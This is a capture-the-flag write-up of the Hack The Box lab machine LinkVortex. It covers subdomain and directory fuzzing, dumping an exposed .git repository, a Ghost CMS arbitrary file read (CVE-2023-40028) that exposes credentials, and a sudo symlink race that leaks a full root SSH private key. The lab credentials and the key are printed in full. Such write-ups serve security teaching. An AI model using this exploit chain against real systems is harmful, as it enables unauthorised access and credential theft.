LinkVortex

Synopsis

LinkVortex is a linux easy machine created by 0xyassine. The Ghost CMS is used in linkvortex.htb domain. The dev subdomain is found during fuzzing and .git directory is present. The content of .git directory is dumped and password for Ghost CMS login is retrieved. The version of Ghost CMS used is 5.58.0 which is vulnerable to CVE-2023-40028 arbitrary file read vulnerability, with which the foothold is gained. The user has a privilege to run clean_symbolic.sh script file as sudo which creates the TOCTOU vulnerability and exploiting it gives us the id_rsa of root.

OS	Difficulty	Points	Release Date	Retired Date
Linux	Easy	20	07-12-2024	12-04-2025

---

Enumeration

Nmap

Starting the nmap scan and found ssh and http services running.

nmap -Pn -sC -sV --min-rate=1000 10.10.11.47
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-20 21:03 EDT
Nmap scan report for 10.10.11.47
Host is up (8.0s latency).
Not shown: 749 filtered tcp ports (no-response), 249 closed tcp ports (reset)
PORT   STATE SERVICE    VERSION
22/tcp open  tcpwrapped
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  tcpwrapped
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://linkvortex.htb/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.18 seconds

Add linkvortex.htb in /etc/hosts file.

Web - linkvortex.htb

The linkvortex is the blogging site where computer parts information is given in details.

The footer reveals that the site is using Ghost CMS and going to ghost directory gives us the ghost login page.

Fuzzing

Subdomain fuzzing found the dev.linkvortex.htb subdomain.

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://linkvortex.htb -H "Host: FUZZ.linkvortex.htb" -fs 230

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://linkvortex.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.linkvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 230
________________________________________________

dev                     [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 1202ms]
:: Progress: [4989/4989] :: Job [1/1] :: 63 req/sec :: Duration: [0:02:04] :: Errors: 40 ::

Add dev.linkvortex.htb in /etc/hosts file.

Web - dev.linkvortex.htb

The dev subdomain gives us launching soon and under construction message.

Fuzzing

Directory fuzzing found the .git directory.

dirsearch -u http://dev.linkvortex.htb
                                                                                                                                                            21:24:34 [12/201]
  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                                      
                                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460                                                                                 
                                                                                                                                                                             
Output File: /home/dexter/HTB/Machines/LinkVortex/reports/http_dev.linkvortex.htb/_25-04-20_21-23-50.txt                                                                     
                                                                                                                                                                             
Target: http://dev.linkvortex.htb/                                                                                                                                           
                                                                                                                                                                             
[21:23:50] Starting:                                                                                                                                                         
[21:24:16] 301 -  239B  - /.git  ->  http://dev.linkvortex.htb/.git/                                                                                                         
[21:24:16] 200 -  557B  - /.git/                                                                                                                                             
[21:24:16] 200 -  201B  - /.git/config
[21:24:16] 200 -   73B  - /.git/description 
[21:24:16] 200 -   41B  - /.git/HEAD
[21:24:16] 200 -  620B  - /.git/hooks/      
[21:24:16] 200 -  402B  - /.git/info/       
[21:24:17] 200 -  240B  - /.git/info/exclude
[21:24:17] 200 -  175B  - /.git/logs/HEAD   
[21:24:17] 200 -  401B  - /.git/logs/
[21:24:17] 200 -  393B  - /.git/refs/       
[21:24:17] 200 -  418B  - /.git/objects/
[21:24:17] 200 -  147B  - /.git/packed-refs 
[21:24:18] 301 -  249B  - /.git/refs/tags  ->  http://dev.linkvortex.htb/.git/refs/tags/
[21:24:27] 403 -  199B  - /.ht_wsr.txt      
[21:24:27] 403 -  199B  - /.htaccess.bak1   
[21:24:30] 403 -  199B  - /.htaccess.orig   
[21:24:30] 403 -  199B  - /.htaccess.sample 
[21:24:32] 403 -  199B  - /.htaccess.save
[21:24:32] 403 -  199B  - /.htaccess_extra  
[21:24:32] 403 -  199B  - /.htaccess_sc     
[21:24:32] 403 -  199B  - /.htaccess_orig
[21:24:32] 403 -  199B  - /.htaccessBAK
[21:24:32] 403 -  199B  - /.htaccessOLD
[21:24:32] 403 -  199B  - /.htaccessOLD2
[21:24:32] 403 -  199B  - /.htm             
[21:24:32] 403 -  199B  - /.html
[21:24:34] 403 -  199B  - /.htpasswd_test   
[21:24:35] 403 -  199B  - /.htpasswds
[21:24:35] 403 -  199B  - /.httr-oauth
[21:24:42] 200 -  691KB - /.git/index
[21:27:53] 403 -  199B  - /cgi-bin/         
[21:31:05] 403 -  199B  - /server-status    
[21:31:05] 403 -  199B  - /server-status/   
                                            
Task Completed

Dumping the content of .git using git-dumper.

git-dumper http://dev.linkvortex.htb/ linkvortex-git -t 120                                                                                                              
[-] Testing http://dev.linkvortex.htb/.git/HEAD [200]                                                                                                                        
[-] Testing http://dev.linkvortex.htb/.git/ [200]                                                                                                                            
[-] Fetching .git recursively                                                                                                                                                
[-] Fetching http://dev.linkvortex.htb/.git/ [200]                                                                                                                           
[-] Fetching http://dev.linkvortex.htb/.gitignore [404]                                                                                                                      
[-] http://dev.linkvortex.htb/.gitignore responded with status code 404                                                                                                      
[-] Fetching http://dev.linkvortex.htb/.git/packed-refs [200]                                                                                                                
[-] Fetching http://dev.linkvortex.htb/.git/config [200]                                                                                                                     
[-] Fetching http://dev.linkvortex.htb/.git/description [200]                                                                                                                
[-] Fetching http://dev.linkvortex.htb/.git/hooks/ [200]                                                                                                                     
[-] Fetching http://dev.linkvortex.htb/.git/HEAD [200]
[-] Fetching http://dev.linkvortex.htb/.git/logs/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/info/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/shallow [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/index [200]
[-] Fetching http://dev.linkvortex.htb/.git/refs/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/update.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/logs/HEAD [200]
[-] Fetching http://dev.linkvortex.htb/.git/info/exclude [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/50/ [200]   
[-] Fetching http://dev.linkvortex.htb/.git/objects/e6/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/pack/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/refs/tags/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/50/864e0261278525197724b394ed4292414d9fec [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/pack/pack-0b802d170fe45db10157bb8e02bfc9397d5e9d87.idx [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/e6/54b0ed7f9c9aedf3180ee1fd94e7e43b29f000 [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/pack/pack-0b802d170fe45db10157bb8e02bfc9397d5e9d87.pack [200]
[-] Fetching http://dev.linkvortex.htb/.git/refs/tags/v5.57.3 [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 5596 paths from the index                                                                                                                        

Git

git status                                                 
Not currently on any branch.
Changes to be committed:
  (use "git restore --staged <file>..." to unstage)
        new file:   Dockerfile.ghost
        modified:   ghost/core/test/regression/api/admin/authentication.test.js

The ghost/core/test/regression/api/admin/authentication.test.js has been changed and not committed yet.

git restore --staged . && git diff
diff --git a/ghost/core/test/regression/api/admin/authentication.test.js b/ghost/core/test/regression/api/admin/authentication.test.js
index 2735588..e654b0e 100644
--- a/ghost/core/test/regression/api/admin/authentication.test.js
+++ b/ghost/core/test/regression/api/admin/authentication.test.js
@@ -53,7 +53,7 @@ describe('Authentication API', function () {
 
         it('complete setup', async function () {
             const email = 'test@example.com';
-            const password = 'thisissupersafe';
+            const password = 'OctopiFociPilfer45';
 
             const requestMock = nock('https://api.github.com')
                 .get('/repos/tryghost/dawn/zipball')

Only the password has been changed. The admin@linkvortex.htb email and the above password gives us access to the ghost dashboard.

---

Foothold

Shell - bob [ CVE-2023 -40028 exploit ]

Going to settings and clicking on About Ghost button shows the details and versions of ghost.

Ghost version < 5.59.1 is vulnerable to CVE-2023-40028 arbitrary file read vulnerability. The PoC with bash script is created in this github repository.

CVE-2023-40028

Affected versions of this package are vulnerable to Arbitrary File Read which allows authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system. More details can be found here.

Exploit

1

Git clone the repository

git clone https://github.com/0xyassine/CVE-2023-40028.git                                                                                                                
Cloning into 'CVE-2023-40028'...                                                                                                                                             
remote: Enumerating objects: 7, done.                                                                                                                                        
remote: Counting objects: 100% (7/7), done.                                                                                                                                  
remote: Compressing objects: 100% (7/7), done.                                                                                                                               
remote: Total 7 (delta 1), reused 4 (delta 0), pack-reused 0 (from 0)                                                                                                        
Receiving objects: 100% (7/7), done.                                                                                                                                         
Resolving deltas: 100% (1/1), done.

2

Executing script

Change the GHOST_URL variable to http://linkvortex.htb and execute the script.

./CVE-2023-40028.sh -u 'admin@linkvortex.htb' -p 'OctopiFociPilfer45'                                                                                                    
WELCOME TO THE CVE-2023-40028 SHELL                                                                                                                                          
file>

file> /etc/passwd                                                                                                                                                            
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
file> 

3

Getting bob credentials

Fetching the ghost config file and found the password for bob.

file> /var/lib/ghost/config.production.json
{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "Direct"
  },
  "logging": {
    "transports": ["stdout"]
  },
  "process": "systemd",
  "paths": {
    "contentPath": "/var/lib/ghost/content" 
  },
  "spam": {
    "user_login": {
        "minWait": 1,
        "maxWait": 604800000,
        "freeRetries": 5000
    }
  },
  "mail": {
     "transport": "SMTP",
     "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
        }
      }
    }
}
file> 

4

SSH login

ssh bob@10.10.11.47   
The authenticity of host '10.10.11.47 (10.10.11.47)' can't be established.
ED25519 key fingerprint is SHA256:vrkQDvTUj3pAJVT+1luldO6EvxgySHoV6DPCcat0WkI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.47' (ED25519) to the list of known hosts.
bob@10.10.11.47's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Apr 21 08:29:20 2025 from 10.10.14.46
bob@linkvortex:~$ 

The user.txt file contains the user flag 👏

---

Privilege Escalation

Pillaging - bob [ user ]

The sudo -l command reveals that the user bob has a sudo privilege to run the /usr/bin/bash /opt/ghost/clean_symlink.sh *.png command.

bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, env_keep+=CHECK_CONTENT

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
bob@linkvortex:~$ 

We don't have write permission over clean_symlink.sh file.

bob@linkvortex:~$ ls -la /opt/ghost/clean_symlink.sh
-rwxr--r-- 1 root root 745 Nov  1 08:46 /opt/ghost/clean_symlink.sh
bob@linkvortex:~$ 

File - clean_symlink.sh

clean_symlink.sh

#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

• The script takes the .png file as a argument and checks whether it is symbolic link or not.

• It also inspects the link target whether it points to /etc or /root directories.

• If it points to those directories it unlink the file otherwise it moves to a quarantine folder /var/quarantined and if the $CHECK_CONTENT variable is set to TRUE, it prints the contents of the linked file.

Shell - root [ TOCTOU ]

Methodology

The time-of-check-time-of-use vulnerability occurs after the symbolic link is created. We can quickly swap the link target to other sensitive files and directories like /etc and /root. If the $CHECK_CONTENT variable is set to TRUE, we can also print the content of the files.

Exploit

1

Forcing symbolic link

Running while loop to force the symbolic link if the file already exists.

bob@linkvortex:~$ while true; do ln -sf /root/.ssh/id_rsa /var/quarantined/exp.png; done

2

Getting id_rsa

Creating another symbolic link in another folder with the same png file name and executing the clean_symlink.sh moves the file into quarantined folder and SSH private key is printed.

bob@linkvortex:~$ export CHECK_CONTENT=true
bob@linkvortex:~$ ln -s /exp /tmp/exp.png                                                                                                                                    
bob@linkvortex:~$ sudo /usr/bin/bash /opt/ghost/clean_symlink.sh /tmp/exp.png                                                                                                
Link found [ /tmp/exp.png ] , moving it to quarantine                                                                                                                        
Content:                                                                                                                                                                     
-----BEGIN OPENSSH PRIVATE KEY-----                                                                                                                                          
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn                                                                                                       
NhAAAAAwEAAQAAAYEAmpHVhV11MW7eGt9WeJ23rVuqlWnMpF+FclWYwp4SACcAilZdOF8T                                                                                                       
q2egYfeMmgI9IoM0DdyDKS4vG+lIoWoJEfZf+cVwaZIzTZwKm7ECbF2Oy+u2SD+X7lG9A6                                                                                                       
V1xkmWhQWEvCiI22UjIoFkI0oOfDrm6ZQTyZF99AqBVcwGCjEA67eEKt/5oejN5YgL7Ipu                                                                                                       
6sKpMThUctYpWnzAc4yBN/mavhY7v5+TEV0FzPYZJ2spoeB3OGBcVNzSL41ctOiqGVZ7yX                                                                                                       
TQ6pQUZxR4zqueIZ7yHVsw5j0eeqlF8OvHT81wbS5ozJBgtjxySWrRkkKAcY11tkTln6NK                                                                                                       
CssRzP1r9kbmgHswClErHLL/CaBb/04g65A0xESAt5H1wuSXgmipZT8Mq54lZ4ZNMgPi53                                                                                                       
jzZbaHGHACGxLgrBK5u4mF3vLfSG206ilAgU1sUETdkVz8wYuQb2S4Ct0AT14obmje7oqS                                                                                                       
0cBqVEY8/m6olYaf/U8dwE/w9beosH6T7arEUwnhAAAFiDyG/Tk8hv05AAAAB3NzaC1yc2                                                                                                       
EAAAGBAJqR1YVddTFu3hrfVnidt61bqpVpzKRfhXJVmMKeEgAnAIpWXThfE6tnoGH3jJoC                                                                                                       
PSKDNA3cgykuLxvpSKFqCRH2X/nFcGmSM02cCpuxAmxdjsvrtkg/l+5RvQOldcZJloUFhL                                                                                                       
woiNtlIyKBZCNKDnw65umUE8mRffQKgVXMBgoxAOu3hCrf+aHozeWIC+yKburCqTE4VHLW                                                                                                       
KVp8wHOMgTf5mr4WO7+fkxFdBcz2GSdrKaHgdzhgXFTc0i+NXLToqhlWe8l00OqUFGcUeM                                                                                                       
6rniGe8h1bMOY9HnqpRfDrx0/NcG0uaMyQYLY8cklq0ZJCgHGNdbZE5Z+jSgrLEcz9a/ZG                                                                                                       
5oB7MApRKxyy/wmgW/9OIOuQNMREgLeR9cLkl4JoqWU/DKueJWeGTTID4ud482W2hxhwAh                                                                                                       
sS4KwSubuJhd7y30httOopQIFNbFBE3ZFc/MGLkG9kuArdAE9eKG5o3u6KktHAalRGPP5u                                                                                                       
qJWGn/1PHcBP8PW3qLB+k+2qxFMJ4QAAAAMBAAEAAAGABtJHSkyy0pTqO+Td19JcDAxG1b
O22o01ojNZW8Nml3ehLDm+APIfN9oJp7EpVRWitY51QmRYLH3TieeMc0Uu88o795WpTZts
ZLEtfav856PkXKcBIySdU6DrVskbTr4qJKI29qfSTF5lA82SigUnaP+fd7D3g5aGaLn69b
qcjKAXgo+Vh1/dkDHqPkY4An8kgHtJRLkP7wZ5CjuFscPCYyJCnD92cRE9iA9jJWW5+/Wc
f36cvFHyWTNqmjsim4BGCeti9sUEY0Vh9M+wrWHvRhe7nlN5OYXysvJVRK4if0kwH1c6AB
VRdoXs4Iz6xMzJwqSWze+NchBlkUigBZdfcQMkIOxzj4N+mWEHru5GKYRDwL/sSxQy0tJ4
MXXgHw/58xyOE82E8n/SctmyVnHOdxAWldJeycATNJLnd0h3LnNM24vR4GvQVQ4b8EAJjj
rF3BlPov1MoK2/X3qdlwiKxFKYB4tFtugqcuXz54bkKLtLAMf9CszzVBxQqDvqLU9NAAAA
wG5DcRVnEPzKTCXAA6lNcQbIqBNyGlT0Wx0eaZ/i6oariiIm3630t2+dzohFCwh2eXS8nZ
VACuS94oITmJfcOnzXnWXiO+cuokbyb2Wmp1VcYKaBJd6S7pM1YhvQGo1JVKWe7d4g88MF
Mbf5tJRjIBdWS19frqYZDhoYUljq5ZhRaF5F/sa6cDmmMDwPMMxN7cfhRLbJ3xEIL7Kxm+
TWYfUfzJ/WhkOGkXa3q46Fhn7Z1q/qMlC7nBlJM9Iz24HAxAAAAMEAw8yotRf9ZT7intLC
+20m3kb27t8TQT5a/B7UW7UlcT61HdmGO7nKGJuydhobj7gbOvBJ6u6PlJyjxRt/bT601G
QMYCJ4zSjvxSyFaG1a0KolKuxa/9+OKNSvulSyIY/N5//uxZcOrI5hV20IiH580MqL+oU6
lM0jKFMrPoCN830kW4XimLNuRP2nar+BXKuTq9MlfwnmSe/grD9V3Qmg3qh7rieWj9uIad
1G+1d3wPKKT0ztZTPauIZyWzWpOwKVAAAAwQDKF/xbVD+t+vVEUOQiAphz6g1dnArKqf5M
SPhA2PhxB3iAqyHedSHQxp6MAlO8hbLpRHbUFyu+9qlPVrj36DmLHr2H9yHa7PZ34yRfoy
+UylRlepPz7Rw+vhGeQKuQJfkFwR/yaS7Cgy2UyM025EEtEeU3z5irLA2xlocPFijw4gUc
xmo6eXMvU90HVbakUoRspYWISr51uVEvIDuNcZUJlseINXimZkrkD40QTMrYJc9slj9wkA
ICLgLxRR4sAx0AAAAPcm9vdEBsaW5rdm9ydGV4AQIDBA==
-----END OPENSSH PRIVATE KEY-----
bob@linkvortex:~$ 

3

Getting shell

Copy the private key and save into the file. Change the permission and ssh as a root.

chmod 600 id_rsa

ssh -i id_rsa root@10.10.11.47
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Dec  2 11:20:43 2024 from 10.10.14.61
root@linkvortex:~# 

If libcrypto error occurs remove the unwanted space from the id_rsa file.

The root.txt file contains the root flag 🎉

---

Proof of Concept

The below video provides the PoC of LinkVortex machine.